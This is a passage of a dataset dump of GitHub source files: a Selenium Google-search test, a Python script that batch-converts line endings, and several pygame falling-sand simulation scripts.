"d1f98057a44a38ebafcb694fba13ff238e9429cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1010, "license_type": "no_license", "max_line_length": 118, "num_lines": 24, "path": "/googlesearch.py", "repo_name": "akshatha206/selenium", "src_encoding": "UTF-8", "text": "import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nclass GoogleSearch(unittest.TestCase):\n @classmethod\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=r'C:\\Users\\user\\Downloads\\chromedriver_win32\\chromedriver.exe')\n self.driver.implicitly_wait(10)\n self.driver.maximize_window()\n def test_search_google(self):\n self.driver.get(\"http://google.com\")\n self.driver.find_element_by_name(\"q\").send_keys(\"Automation step by step\")\n self.driver.find_element_by_name(\"btnK\").click()\n def test_search_me(self):\n self.driver.get(\"http://google.com\")\n self.driver.find_element_by_name(\"q\").send_keys(\"Akshatha Shivanna instagram\")\n self.driver.find_element_by_name(\"btnK\").click()\n @classmethod\n def tearDown(self):\n self.driver.close()\n self.driver.quit()\n print(\"test completed\")\nif __name__ == \"__main__\":\n\tunittest.main(argv=['first-arg-is-ignored'], exit=False) \n" } ]
2
Kevin163/python_samples
https://github.com/Kevin163/python_samples
410975efb28ee59e973c71b6aeeffb3340f5176f
555c9b72c501ceca72054d1e272219c9f769243a
0560da2b7f2b7cdaa8a4414e17da56ebdd9583ac
refs/heads/master
2021-05-08T09:23:00.231286
2017-10-16T11:42:13
2017-10-16T11:42:13
107,119,404
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.585300087928772, "alphanum_fraction": 0.6109238266944885, "avg_line_length": 19.83823585510254, "blob_id": "c0831d5e4393f86c8fd0848704a405d74cc58dbc", "content_id": "fb93f41790ba76924744d120b07c7070bab1051d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1739, "license_type": "permissive", "max_line_length": 48, "num_lines": 68, "path": "/batchChangeFileLine.py", "repo_name": "Kevin163/python_samples", "src_encoding": "UTF-8", "text": "# batchChangeFileLine.py\r\n# Created:2017-10-13 17:28:40\r\n\r\n'''\r\n批量修改指定目录文件的换行符\r\n调用示例:\r\n将d:\\temp目录下的所有文件的换行符由\\n替换为\\r\\n\r\npy batchChangeFileLine d:\\temp\r\n将d:\\temp目录下的所有文件的换行符由\\r\\n替换为\\n\r\npy batchChangeFileLine d:\\temp 1\r\n'''\r\n\r\n__author__ = \"Kevin\"\r\n__version__ = \"1.0\"\r\n\r\nimport os\r\nimport sys\r\n\r\ndef batchChangeFileLine(workDir,win2unix=False):\r\n\tfiles = os.listdir(workDir)\r\n\toldStr = b\"\\r\"\r\n\tnewStr = b\"\"\r\n\tif not win2unix:\r\n\t\toldStr = b\"\\n\"\r\n\t\tnewStr = b\"\\r\\n\"\r\n\tdata = b''\r\n\tfor f in files:\t\t\r\n\t\tfold = os.path.join(workDir,f)\r\n\t\tfnew = os.path.join(workDir,\"$\"+f)\r\n\t\tif os.path.isfile(fold):\r\n\t\t\ttry:\r\n\t\t\t\tprint(\"开始处理文件:{0}\".format(fold))\r\n\t\t\t\twith open(fold,'rb+') as fr:\r\n\t\t\t\t\twith open(fnew,'ba+') as fw:\r\n\t\t\t\t\t\twhile(True):\r\n\t\t\t\t\t\t\tdata = fr.read(200)\r\n\t\t\t\t\t\t\tnewData = data.replace(oldStr,newStr)\r\n\t\t\t\t\t\t\tfw.write(newData)\r\n\t\t\t\t\t\t\tif len(data) < 200:\r\n\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\tos.remove(fold)\r\n\t\t\t\tos.rename(fnew,fold)\r\n\t\t\t\tprint(\"结束处理文件:{0}\".format(fold))\r\n\t\t\texcept IOError as e:\r\n\t\t\t\tprint(\"处理文件{0}失败,原因:{1}\".format(fold,e))\r\n\r\ndef main():\r\n\tworkDir = \"\"\r\n\twin2unix = False\r\n\targLen = len(sys.argv)\r\n\tif(argLen > 1):\r\n\t\tworkDir = sys.argv[1]\r\n\tif(argLen > 2):\r\n\t\twin2unix = int(sys.argv[2]) == 1\r\n\tif(workDir != \"\"): \r\n\t\tbatchChangeFileLine(workDir,win2unix)\r\n\telse:\r\n\t\tprint(r'''\r\n批量修改指定目录文件的换行符\r\n调用示例:\r\n将d:\\temp目录下的所有文件的换行符由\\n替换为\\r\\n\r\npy batchChangeFileLine d:\\temp\r\n将d:\\temp目录下的所有文件的换行符由\\r\\n替换为\\n\r\npy batchChangeFileLine d:\\temp 1\r\n''')\r\n\r\nif __name__ == '__main__':\r\n\tmain()" }, { "alpha_fraction": 0.8780487775802612, "alphanum_fraction": 0.8780487775802612, "avg_line_length": 19.5, "blob_id": "c6fe8477e71a4e4e82ea7d91c31bbdc6a19cc389", "content_id": "97ff5377eb76cbc9686b6a97b80c2d54a606cbc1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "permissive", "max_line_length": 23, "num_lines": 2, "path": "/README.md", "repo_name": "Kevin163/python_samples", "src_encoding": "UTF-8", "text": "# python_samples\n学习python过程中的示例代码和常用工具代码\n" } ]
2
JoshuaBragg/SandSimulator
https://github.com/JoshuaBragg/SandSimulator
3dfbe83efd5ed51de31a7d4c1622a3f37d0aa5e7
fad13e5c8124d46c5d985487286375ce0f212d52
6191d4c3836ef85a11cc7f7139c52bef99dba4c1
refs/heads/master
2021-06-30T03:45:32.807576
2017-09-18T17:35:47
2017-09-18T17:35:47
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5403437614440918, "alphanum_fraction": 0.6014155745506287, "avg_line_length": 70.69117736816406, "blob_id": "7ed9b39f8ff9eebfe32ed30efdd8b2e80c740b2a", "content_id": "700f432f05ef2f7b276f2dd3c802e60439a59f05", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4945, "license_type": "permissive", "max_line_length": 353, "num_lines": 68, "path": "/SandFullSolidCLComp.py", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "import pygame, random, math\r\nscreen = pygame.display.set_mode((0,0), pygame.FULLSCREEN); pygame.display.set_caption(\"Sand\"); pygame.font.init(); pygame.init();sandl = [];barl = [];clock = pygame.time.Clock();board = [[0]*math.ceil(screen.get_width()/5) for i in range(math.ceil(screen.get_height()/5))];board[math.ceil(screen.get_height()/5)-1] = [1]*math.ceil(screen.get_width()/5)\r\nfor i in range(0,math.ceil(screen.get_height()/5)-1):\r\n\tboard[i][0] = 1;board[i][math.ceil(screen.get_width()/5)-1] = 1\r\nbn = board[:];r = random.randint(10,245);g = random.randint(10,245);b = random.randint(10,245);r1 = 1;g1 = 0;b1 = 1;rg1 = 0;gg1 = 1;bg1 = 0;rg = 250;gg = 250;bc = 250\r\nwhile (True):\r\n\tclock.tick(60);screen.fill((255,255,255))\r\n\tif (pygame.mouse.get_pressed()[0]):\r\n\t\tif (r > 253):r1 = 0\t\r\n\t\tif (r < 2):r1 = 1\r\n\t\tif (r1 == 1):r = r + .15\t\t\t\r\n\t\tif (r1 == 0):r = r - .15\r\n\t\tif (g > 253):g1 = 0\t\t\r\n\t\tif (g < 2):g1 = 1\t\t\r\n\t\tif (g1 == 1):g = g + .1\t\t\r\n\t\tif (g1 == 0):g = g - .1\t\r\n\t\tif (b > 253):b1 = 0\t\t\r\n\t\tif (b < 2):b1 = 1\r\n\t\tif (b1 == 1):b = b + .05\t\t\t\r\n\t\tif (b1 == 0):b = b - .05\r\n\tclass Sand():\r\n\t\tdef __init__(self):\r\n\t\t\tself.colour = (r,g,b);self.velox = 0;self.x = xm;self.y = ym;self.yf = int(self.y)\r\n\t\t\twhile (abs(self.velox) < .5):self.velox = random.randint(-48,48)/80\r\n\t\tdef ID(self,ID):self.ID = ID\r\n\t\tdef Fall(self):\r\n\t\t\tself.x += self.velox\r\n\t\t\tif self.velox > 0:self.velox -= .01\r\n\t\t\tif self.velox < 0 :self.velox += .01\r\n\t\t\tif abs(self.velox) < 0.2:self.velox = 0\r\n\t\t\tself.x = int(round(self.x,0))\r\n\t\t\tif self.yf < (math.ceil(screen.get_height()/5)-1) and 0 < self.x < (math.ceil(screen.get_width()/5)-1):board[self.yf][self.x] = 1\r\n\t\t\tif board[self.yf+1][self.x] != 1:board[self.yf][self.x] = 0;self.y += 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0;self.d = random.randint(0,1)\r\n\t\t\t\tif self.d == 0:self.x += 1\r\n\t\t\t\telse:self.x -= 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] == 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:board[self.yf][self.x] = 0;self.x += 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] == 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:board[self.yf][self.x] = 0;self.x -= 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] == 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] == 1:board[self.yf][self.x] = 0;self.x += 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] == 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] == 1 and board[self.yf][self.x-1] != 1:board[self.yf][self.x] = 0;self.x -= 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] == 1 and board[self.yf+1][self.x-1] == 1:del sandl[sandl.index(self.ID)]\r\n\t\t\tself.yf = int(round(self.y,0));pygame.draw.rect(screen, self.colour, (self.x*5,self.yf*5,5,5),0)\r\n\tclass Barrier():\r\n\t\tdef __init__(self):\r\n\t\t\tself.x = int(xm);self.y = int(ym)\r\n\t\t\ttry:board[self.y][self.x] = 1;board[self.y+1][self.x+1] = 1;board[self.y+1][self.x] = 1;board[self.y+1][self.x-1] = 1;board[self.y][self.x+1] = 1;board[self.y][self.x-1] = 1;board[self.y-1][self.x+1] = 1;board[self.y-1][self.x] = 1;board[self.y-1][self.x-1] = 1\t\r\n\t\t\texcept IndexError:pass\r\n\t\tdef ShowBarrier(self):pygame.draw.rect(screen, (r,g,b), (self.x*5-5,self.y*5-5,15,15),0)\r\n\txa, ya = pygame.mouse.get_pos();xp = xa%5;xm = (xa-xp)/5;yp = ya%5;ym = (ya-yp)/5\r\n\tif pygame.mouse.get_pressed()[2]:bar = Barrier();barl.append(bar)\r\n\tif pygame.mouse.get_pressed()[0]:sand = Sand();sandl.append(sand);sand.ID(sand);sand = Sand();sandl.append(sand);sand.ID(sand)\r\n\tfor i in range(0,len(sandl)):\r\n\t\ttry:sandl[i].Fall()\r\n\t\texcept IndexError:pass\r\n\tfor i in range(0,math.ceil(screen.get_height()/5)):\r\n\t\tfor c in range(0,math.ceil(screen.get_width()/5)):\r\n\t\t\tif bn[i][c] == 1:pygame.draw.rect(screen, (r,g,b), (c*5,i*5,5,5),0)\r\n\tfor i in range(0,len(barl)):\r\n\t\ttry:barl[i].ShowBarrier()\r\n\t\texcept IndexError:pass\r\n\tpygame.draw.rect(screen, (r,g,b), (0,screen.get_height()-5,screen.get_width(),5),0);pygame.draw.rect(screen, (r,g,b), (0,0,5,screen.get_width()),0);pygame.draw.rect(screen, (r,g,b), (screen.get_width()-5,0,5,screen.get_height()),0)\r\n\tpygame.display.flip();event = pygame.event.poll()\r\n\tif pygame.key.get_pressed()[pygame.K_DELETE]:\r\n\t\tboard = [[0]*math.ceil(screen.get_width()/5) for i in range(math.ceil(screen.get_height()/5))];board[math.ceil(screen.get_height()/5)-1] = [1]*math.ceil(screen.get_width()/5)\r\n\t\tfor i in range(0,math.ceil(screen.get_height()/5)-1):board[i][0] = 1;board[i][math.ceil(screen.get_width()/5)-1] = 1\r\n\t\tsandl = [];barl = [];bn = board[:]\r\n\tif pygame.key.get_pressed()[pygame.K_ESCAPE]:break\r\n\r\n" }, { "alpha_fraction": 0.521774172782898, "alphanum_fraction": 0.5895161032676697, "avg_line_length": 18.66666603088379, "blob_id": "9472b738b0669a6763af600a38ea36d6f2ff2d6b", "content_id": "60c5cd6a00091957740ae0ec3e1d60eb10bf33b0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1240, "license_type": "permissive", "max_line_length": 51, "num_lines": 60, "path": "/Sandt.py", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "import pygame, random\r\nscreen = pygame.display.set_mode((1000,750))\r\npygame.display.set_caption(\"Sand\")\r\npygame.font.init()\r\npygame.init()\r\n\r\n#Colours\r\nif (True):\r\n\tblack = (0,0,0)\r\n\twhite = (255,255,255)\r\n\tred = (255,0,0)\r\n\tgreen = (0,255,0)\r\n\tdark_green = (30,140,47)\r\n\tblue = (0,0,255)\r\n\tbrown = (83,67,27)\r\n\tyellow = (255,255,0)\r\n\tgray = (150, 150, 150)\r\n\r\nsandl = []\r\nclock = pygame.time.Clock()\r\n\r\nwhile (True):\r\n\tclock.tick(120)\r\n\tscreen.fill(white)\r\n\t\r\n\tclass Sand():\r\n\t\tdef __init__(self):\r\n\t\t\tself.image = pygame.image.load(\"pexplosion.jpg\")\r\n\t\t\tself.rect = self.image.get_rect()\r\n\t\t\tself.velox = 0\r\n\t\t\twhile (self.velox == 0):\r\n\t\t\t\tself.velox = random.randint(-10,10)/10\r\n\t\t\tself.veloy = 0\r\n\t\t\twhile (self.veloy == 0):\r\n\t\t\t\tself.veloy = random.randint(-10,10)/10\r\n\t\t\tself.x = xa\r\n\t\t\tself.y = ya\r\n\t\t\r\n\t\tdef Fall(self):\r\n\t\t\tself.rect.topleft = (self.x,self.y)\r\n\t\t\tself.x += self.velox\r\n\t\t\tself.y += self.veloy\r\n\t\t\tscreen.blit(self.image, self.rect)\r\n\t\t\t\r\n\t\r\n\txa, ya = pygame.mouse.get_pos()\r\n\t\r\n\tif pygame.mouse.get_pressed()[0]:\r\n\t\tsand = Sand()\r\n\t\tsandl.append(sand)\r\n\t\t\r\n\tfor i in range(0,len(sandl)):\r\n\t\tsandl[i].Fall()\r\n\t\r\n\t\r\n\t\r\n\tpygame.display.flip()\r\n\tevent = pygame.event.poll()\r\n\tif (event.type == pygame.QUIT):\r\n\t\tbreak\r\n" }, { "alpha_fraction": 0.8070175647735596, "alphanum_fraction": 0.8070175647735596, "avg_line_length": 19.727272033691406, "blob_id": "29153001775e2071d12abaaa994d0ecef8c561b8", "content_id": "503c21ea80adce6264e289fffeb6aa14a138c126", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 228, "license_type": "permissive", "max_line_length": 120, "num_lines": 11, "path": "/README.md", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "# SandSimulator\n\nSand Simulation made in Python\n\nUse SandFullScreen.py for newest version or SandBarrier.py for older/slower/not fullscreen but still functioning version\n\nControls:\n\n\tLeft-Click: sand\n\n\tRight-Click: draw barrier\n" }, { "alpha_fraction": 0.5239999890327454, "alphanum_fraction": 0.5784000158309937, "avg_line_length": 17.841270446777344, "blob_id": "ade9928f9c9fbe05b1c10d524f8a17499bf723b8", "content_id": "b49714a862187bf81521ec60ba57832230b66a51", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1250, "license_type": "permissive", "max_line_length": 82, "num_lines": 63, "path": "/Sanddraw.py", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "import pygame\r\nscreen = pygame.display.set_mode((1000,750))\r\npygame.display.set_caption(\"Sand\")\r\npygame.font.init()\r\npygame.init()\r\n\r\n#Colours\r\nif (True):\r\n\tblack = (0,0,0)\r\n\twhite = (255,255,255)\r\n\tred = (255,0,0)\r\n\tgreen = (0,255,0)\r\n\tdark_green = (30,140,47)\r\n\tblue = (0,0,255)\r\n\tbrown = (83,67,27)\r\n\tyellow = (255,255,0)\r\n\tgray = (150, 150, 150)\r\n\r\nsandl = []\r\nsandloc = []\r\n\r\nwhile (True):\r\n\tscreen.fill(white)\r\n\t\r\n\tclass Sand():\r\n\t\tdef __init__(self):\r\n\t\t\tself.image = pygame.image.load(\"pexplosion.jpg\")\r\n\t\t\tself.x = xa\r\n\t\t\tself.y = ya\r\n\t\t\t\r\n\t\tdef ID(self):\r\n\t\t\tself.loc = sandl.index(sand)\r\n\t\t\r\n\t\tdef Fall(self):\r\n\t\t\tscreen.blit(self.image, (self.x,self.y))\r\n\t\t\ttry:\r\n\t\t\t\tsandloc[self.loc] = (self.x,self.y)\r\n\t\t\texcept IndexError:\r\n\t\t\t\tsandloc.append(\"\")\r\n\t\t\t\tsandloc[self.loc] = (self.x,self.y)\r\n\t\t\tif self.loc != 0:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tpygame.draw.line(screen, black, (sandloc[self.loc]),(sandloc[self.loc-1]), 6)\r\n\t\t\t\texcept IndexError:\r\n\t\t\t\t\tpass\r\n\t\t\t\r\n\t\r\n\txa, ya = pygame.mouse.get_pos()\r\n\t\r\n\tif pygame.mouse.get_pressed()[0]:\r\n\t\tsand = Sand()\r\n\t\tsandl.append(sand)\r\n\t\tsand.ID()\r\n\t\t\r\n\tfor i in range(0,len(sandl)):\r\n\t\tsandl[i].Fall()\r\n\t\r\n\t\r\n\t\r\n\tpygame.display.flip()\r\n\tevent = pygame.event.poll()\r\n\tif (event.type == pygame.QUIT):\r\n\t\tbreak\r\n" }, { "alpha_fraction": 0.4779771566390991, "alphanum_fraction": 0.5481239557266235, "avg_line_length": 17.9891300201416, "blob_id": "7236b11c5d8aa72f5d44e470003a13af9f4787fb", "content_id": "30f9d3c6344e629afc80a7839ef2f918825e1331", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1839, "license_type": "permissive", "max_line_length": 68, "num_lines": 92, "path": "/SandChrissucks.py", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "import pygame, random, os\r\nscreen = pygame.display.set_mode((150,100))\r\npygame.display.set_caption(\"Sand\")\r\npygame.font.init()\r\npygame.init()\r\n\r\n#Colours\r\nif (True):\r\n\tblack = (0,0,0)\r\n\twhite = (255,255,255)\r\n\tred = (255,0,0)\r\n\tgreen = (0,255,0)\r\n\tdark_green = (30,140,47)\r\n\tblue = (0,0,255)\r\n\tbrown = (83,67,27)\r\n\tyellow = (255,255,0)\r\n\tgray = (150, 150, 150)\r\n\r\nsandl = []\r\nsandr = []\r\nclock = pygame.time.Clock()\r\nboard = [[0]*30 for i in range(20)]\r\nboard[19] = [1]*29\r\nfor i in range(0,19):\r\n\tboard[i][0] = 1\r\n\tboard[i][29] = 1\r\nr = 0\r\ng = 0\r\nb = 0\r\n\r\nwhile (True):\r\n\tclock.tick(10)\r\n\tscreen.fill(white)\r\n\tos.system('cls')\r\n\tfor i in range(0,20):\r\n\t\tprint (board[i])\r\n\t\r\n\tclass Sand():\r\n\t\tdef __init__(self):\r\n\t\t\tself.colour = (r,g,b)\r\n\t\t\tself.velox = 0\r\n\t\t\twhile (abs(self.velox) < .5):\r\n\t\t\t\tself.velox = random.randint(-24,24)/40\r\n\t\t\tself.x = xm\r\n\t\t\tself.y = ym\r\n\t\t\tself.yf = int(self.y)\r\n\t\t\r\n\t\tdef ID(self):\r\n\t\t\tself.loc = sandl.index(sand)\r\n\t\t\r\n\t\tdef Fall(self):\r\n\t\t\tself.x += self.velox\r\n\t\t\tif self.velox > 0:\r\n\t\t\t\tself.velox -= .01\r\n\t\t\tif self.velox < 0 :\r\n\t\t\t\tself.velox += .01\r\n\t\t\tif abs(self.velox) < 0.2:\r\n\t\t\t\tself.velox = 0\r\n\t\t\tself.x = int(round(self.x,0))\r\n\t\t\tif self.yf < 19 and 0 < self.x < 29:\r\n\t\t\t\tboard[self.yf][self.x] = 1\r\n\t\t\tif board[self.yf+1][self.x] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.y += .8\r\n\t\t\tself.yf = int(round(self.y,0))\r\n\t\t\t\r\n\t\t\tpygame.draw.rect(screen, self.colour, (self.x*5,self.yf*5,5,5),0)\r\n\t\t\t\r\n\t\r\n\txa, ya = pygame.mouse.get_pos()\r\n\t\r\n\txp = xa%5\r\n\txm = (xa-xp)/5\r\n\typ = ya%5\r\n\tym = (ya-yp)/5\r\n\t\r\n\tprint (xm,ym)\r\n\t\r\n\tif pygame.mouse.get_pressed()[0]:\r\n\t\tsand = Sand()\r\n\t\tsandl.append(sand)\r\n\t\tsand.ID()\r\n\t\t\r\n\tsandr2 = sandr\r\n\t\t\r\n\tfor i in range(0,len(sandl)):\r\n\t\tsandl[i].Fall()\t\t\t\t\r\n\t\r\n\tpygame.display.flip()\r\n\tevent = pygame.event.poll()\r\n\tif (event.type == pygame.QUIT):\r\n\t\tbreak\r\n" }, { "alpha_fraction": 0.453562468290329, "alphanum_fraction": 0.5246186256408691, "avg_line_length": 23.628713607788086, "blob_id": "9a7b5b1ee1e8babffc69f3c372160cfd4da4f1a8", "content_id": "d8e54c2ab12e2054e1b74df9192809de51712abc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5179, "license_type": "permissive", "max_line_length": 176, "num_lines": 202, "path": "/SandFull.py", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "import pygame, random, math\r\nscreen = pygame.display.set_mode((0,0), pygame.FULLSCREEN)\r\npygame.display.set_caption(\"Sand\")\r\npygame.font.init()\r\npygame.init()\r\n\r\nif (True):\r\n\tblack = (0,0,0)\r\n\twhite = (255,255,255)\r\n\tred = (255,0,0)\r\n\tgreen = (0,255,0)\r\n\tdark_green = (30,140,47)\r\n\tblue = (0,0,255)\r\n\tbrown = (83,67,27)\r\n\tyellow = (255,255,0)\r\n\tgray = (150, 150, 150)\r\n\r\nsandl = []\r\nbarl = []\r\nclock = pygame.time.Clock()\r\nboard = [[0]*math.ceil(screen.get_width()/5) for i in range(math.ceil(screen.get_height()/5))]\r\nboard[math.ceil(screen.get_height()/5)-1] = [1]*math.ceil(screen.get_width()/5)\r\nfor i in range(0,math.ceil(screen.get_height()/5)-1):\r\n\tboard[i][0] = 1\r\n\tboard[i][math.ceil(screen.get_width()/5)-1] = 1\r\nr = v = random.randint(10,245)\r\ng = n = random.randint(10,245)\r\nb = m = random.randint(10,245)\r\nr1 = 1\r\ng1 = 0\r\nb1 = 1\r\nrg1 = 0\r\ngg1 = 1\r\nbg1 = 0\r\nrg = 250\r\ngg = 250\r\nbc = 250\r\n\r\nwhile (True):\r\n\tclock.tick(60)\r\n\tscreen.fill((rg,gg,bc))\r\n\r\n\tif (True):\r\n\t\tif (rg > 253):\r\n\t\t\trg1 = 0\r\n\t\tif (rg < 240):\r\n\t\t\trg1 = 1\t\r\n\t\tif (rg1 == 1):\r\n\t\t\trg = rg + .05\t\t\t\r\n\t\tif (rg1 == 0):\r\n\t\t\trg = rg - .05\r\n\t\tif (gg > 253):\r\n\t\t\tgg1 = 0\r\n\t\tif (gg < 240):\r\n\t\t\tgg1 = 1\r\n\t\tif (gg1 == 1):\r\n\t\t\tgg = gg + .1\t\r\n\t\tif (gg1 == 0):\r\n\t\t\tgg = gg - .1\t\r\n\t\tif (bc > 253):\r\n\t\t\tbg1 = 0\t\t\r\n\t\tif (bc < 240):\r\n\t\t\tbg1 = 1\t\t\r\n\t\tif (bg1 == 1):\r\n\t\t\tbc = bc + .15\t\r\n\t\tif (bg1 == 0):\r\n\t\t\tbc = bc - .15\r\n\t\r\n\tif (pygame.mouse.get_pressed()[0]):\r\n\t\tif (r > 253):\r\n\t\t\tr1 = 0\t\r\n\t\tif (r < 2):\r\n\t\t\tr1 = 1\t\t\r\n\t\tif (r1 == 1):\r\n\t\t\tr = r + .15\t\t\t\r\n\t\tif (r1 == 0):\r\n\t\t\tr = r - .15\r\n\t\tif (g > 253):\r\n\t\t\tg1 = 0\t\t\r\n\t\tif (g < 2):\r\n\t\t\tg1 = 1\t\t\r\n\t\tif (g1 == 1):\r\n\t\t\tg = g + .1\t\t\r\n\t\tif (g1 == 0):\r\n\t\t\tg = g - .1\t\r\n\t\tif (b > 253):\r\n\t\t\tb1 = 0\t\t\r\n\t\tif (b < 2):\r\n\t\t\tb1 = 1\r\n\t\tif (b1 == 1):\r\n\t\t\tb = b + .05\t\t\t\r\n\t\tif (b1 == 0):\r\n\t\t\tb = b - .05\r\n\t\r\n\tclass Sand():\r\n\t\tdef __init__(self):\r\n\t\t\tself.colour = (r,g,b)\r\n\t\t\tself.velox = 0\r\n\t\t\twhile (abs(self.velox) < .5):\r\n\t\t\t\tself.velox = random.randint(-48,48)/80\r\n\t\t\tself.x = xm\r\n\t\t\tself.y = ym\r\n\t\t\tself.yf = int(self.y)\r\n\t\t\r\n\t\tdef Fall(self):\r\n\t\t\tself.x += self.velox\r\n\t\t\tif self.velox > 0:\r\n\t\t\t\tself.velox -= .01\r\n\t\t\tif self.velox < 0 :\r\n\t\t\t\tself.velox += .01\r\n\t\t\tif abs(self.velox) < 0.2:\r\n\t\t\t\tself.velox = 0\r\n\t\t\tself.x = int(round(self.x,0))\r\n\t\t\tif self.yf < (math.ceil(screen.get_height()/5)-1) and 0 < self.x < (math.ceil(screen.get_width()/5)-1):\r\n\t\t\t\tboard[self.yf][self.x] = 1\r\n\t\t\tif board[self.yf+1][self.x] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.y += 1\r\n\t\t\t\t\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.d = random.randint(0,1)\r\n\t\t\t\tif self.d == 0:\r\n\t\t\t\t\tself.x += 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.x -= 1\r\n\t\t\t\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] == 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.x += 1\r\n\t\t\t\t\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] == 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.x -= 1\r\n\t\t\t\t\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] == 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] == 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.x += 1\r\n\t\t\t\t\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] == 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] == 1 and board[self.yf][self.x-1] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.x -= 1\r\n\t\t\t\t\r\n\t\t\tself.yf = int(round(self.y,0))\r\n\t\t\t\r\n\t\t\tpygame.draw.rect(screen, self.colour, (self.x*5,self.yf*5,5,5),0)\r\n\t\t\t\r\n\tclass Barrier():\r\n\t\tdef __init__(self):\r\n\t\t\tself.x = int(xm)\r\n\t\t\tself.y = int(ym)\r\n\t\t\t\r\n\t\tdef ShowBarrier(self):\r\n\t\t\tboard[self.y][self.x] = 1\r\n\t\t\tboard[self.y+1][self.x+1] = 1\r\n\t\t\tboard[self.y+1][self.x] = 1\r\n\t\t\tboard[self.y+1][self.x-1] = 1\r\n\t\t\tboard[self.y][self.x+1] = 1\r\n\t\t\tboard[self.y][self.x-1] = 1\r\n\t\t\tboard[self.y-1][self.x+1] = 1\r\n\t\t\tboard[self.y-1][self.x] = 1\r\n\t\t\tboard[self.y-1][self.x-1] = 1\t\t\t\r\n\t\t\tpygame.draw.rect(screen, black, (self.x*5-5,self.y*5-5,15,15),0)\r\n\t\t\t\r\n\t\t\t\r\n\tpygame.draw.rect(screen, (v,n,m), (0,screen.get_height()-5,screen.get_width(),5),0)\r\n\tpygame.draw.rect(screen, (v,n,m), (0,0,5,screen.get_width()),0)\r\n\tpygame.draw.rect(screen, (v,n,m), (screen.get_width()-5,0,5,screen.get_height()),0)\r\n\t\r\n\txa, ya = pygame.mouse.get_pos()\r\n\t\r\n\txp = xa%5\r\n\txm = (xa-xp)/5\r\n\typ = ya%5\r\n\tym = (ya-yp)/5\r\n\t\r\n\tif pygame.mouse.get_pressed()[2]:\r\n\t\tbar = Barrier()\r\n\t\tbarl.append(bar)\r\n\t\r\n\tif pygame.mouse.get_pressed()[0]:\r\n\t\tsand = Sand()\r\n\t\tsandl.append(sand)\r\n\t\tsand = Sand()\r\n\t\tsandl.append(sand)\r\n\t\t\r\n\tfor i in range(0,len(sandl)):\r\n\t\ttry:\r\n\t\t\tsandl[i].Fall()\r\n\t\texcept IndexError:\r\n\t\t\tpass\r\n\t\t\t\r\n\tfor i in 